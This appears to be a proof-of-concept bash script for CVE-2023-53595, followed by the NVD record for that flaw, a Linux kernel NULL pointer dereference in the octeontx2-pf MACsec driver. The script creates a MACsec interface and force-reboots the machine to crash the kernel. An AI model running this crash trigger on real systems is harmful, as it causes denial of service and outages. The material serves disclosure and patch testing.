CVE-2023-53595

# CVE-2023-53595 PoC - Trigger NULL pointer dereference in octeontx2-pf MACsec module # This PoC demonstrates how to trigger the vulnerability on affected systems # Requirements: Linux kernel with octeontx2-pf driver, root or CAP_NET_ADMIN privileges #!/bin/bash # Step 1: Create a MACsec interface on top of the octeontx2-pf device # Replace eth0 with the actual interface name using octeontx2-pf driver PHY_IF="eth0" MACSEC_IF="macsec0" # Create MACsec interface ip link add link $PHY_IF $MACSEC_IF type macsec # Step 2: Bring up the MACsec interface ip link set $MACSEC_IF up ip link set $PHY_IF up # Step 3: Trigger system reboot to trigger the NULL pointer dereference # The crash occurs during device shutdown when teardown order is incorrect echo "Triggering reboot to crash the kernel..." sleep 2 reboot -f # After the reboot command, the kernel will crash with: # Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 # Call trace: # cn10k_mdo_del_secy+0x24/0x180 # macsec_common_dellink+0xec/0x120 # macsec_notify+0x17c/0x1c0 # ... # otx2_remove+0x8c/0x310 # pci_device_shutdown+0x30/0x70 # device_shutdown+0x11c/0x204

{"cve": {"id": "CVE-2023-53595", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.030", "lastModified": "2026-03-21T00:55:28.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: mcs: Fix NULL pointer dereferences\n\nWhen system is rebooted after creating macsec interface\nbelow NULL pointer dereference crashes occurred. This\npatch fixes those crashes by using correct order of teardown\n\n[ 3324.406942] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000\n[ 3324.415726] Mem abort info:\n[ 3324.418510] ESR = 0x96000006\n[ 3324.421557] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 3324.426865] SET = 0, FnV = 0\n[ 3324.429913] EA = 0, S1PTW = 0\n[ 3324.433047] Data abort info:\n[ 3324.435921] ISV = 0, ISS = 0x00000006\n[ 3324.439748] CM = 0, WnR = 0\n....\n[ 3324.575915] Call trace:\n[ 3324.578353] cn10k_mdo_del_secy+0x24/0x180\n[ 3324.582440] macsec_common_dellink+0xec/0x120\n[ 3324.586788] macsec_notify+0x17c/0x1c0\n[ 3324.590529] raw_notifier_call_chain+0x50/0x70\n[ 3324.594965] call_netdevice_notifiers_info+0x34/0x7c\n[ 3324.599921] rollback_registered_many+0x354/0x5bc\n[ 3324.604616] unregister_netdevice_queue+0x88/0x10c\n[ 3324.609399] unregister_netdev+0x20/0x30\n[ 3324.613313] otx2_remove+0x8c/0x310\n[ 3324.616794] pci_device_shutdown+0x30/0x70\n[ 3324.620882] device_shutdown+0x11c/0x204\n\n[ 966.664930] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000\n[ 966.673712] Mem abort info:\n[ 966.676497] ESR = 0x96000006\n[ 966.679543] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 966.684848] SET = 0, FnV = 0\n[ 966.687895] EA = 0, S1PTW = 0\n[ 966.691028] Data abort info:\n[ 966.693900] ISV = 0, ISS = 0x00000006\n[ 966.697729] CM = 0, WnR = 0\n[ 966.833467] Call trace:\n[ 966.835904] cn10k_mdo_stop+0x20/0xa0\n[ 966.839557] macsec_dev_stop+0xe8/0x11c\n[ 966.843384] __dev_close_many+0xbc/0x140\n[ 966.847298] dev_close_many+0x84/0x120\n[ 966.851039] rollback_registered_many+0x114/0x5bc\n[ 966.855735] unregister_netdevice_many.part.0+0x14/0xa0\n[ 966.860952] unregister_netdevice_many+0x18/0x24\n[ 966.865560] macsec_notify+0x1ac/0x1c0\n[ 966.869303] raw_notifier_call_chain+0x50/0x70\n[ 966.873738] call_netdevice_notifiers_info+0x34/0x7c\n[ 966.878694] rollback_registered_many+0x354/0x5bc\n[ 966.883390] unregister_netdevice_queue+0x88/0x10c\n[ 966.888173] unregister_netdev+0x20/0x30\n[ 966.892090] otx2_remove+0x8c/0x310\n[ 966.895571] pci_device_shutdown+0x30/0x70\n[ 966.899660] device_shutdown+0x11c/0x204\n[ 966.903574] __do_sys_reboot+0x208/0x290\n[ 966.907487] __arm64_sys_reboot+0x20/0x30\n[ 966.911489] el0_svc_handler+0x80/0x1c0\n[ 966.915316] el0_svc+0x8/0x180\n[ 966.918362] Code: f9400000 f9400a64 91220014 f94b3403 (f9400060)\n[ 966.924448] ---[ end trace 341778e799c3d8d7 ]---"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.29", "matchCriteriaId": "69A65F0E-38E0-4491-A1A6-176DA6E5B276"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.16", "matchCriteriaId": "F92F7C8E-A977-4255-B1B6-D1908D8B408F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.3", "matchCriteriaId": "6D96A7FC-D812-4458-AEA8-3FF4023E6B75"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1152c0f947b76e7731e039185cbd00fdb4389f00", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/13ff119b17e5e2916435ce01a0156c8698ad9e16", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/699af748c61574125d269db260dabbe20436d74e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a3dcc45eca017fca82ac47dbde6f41af960657e5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}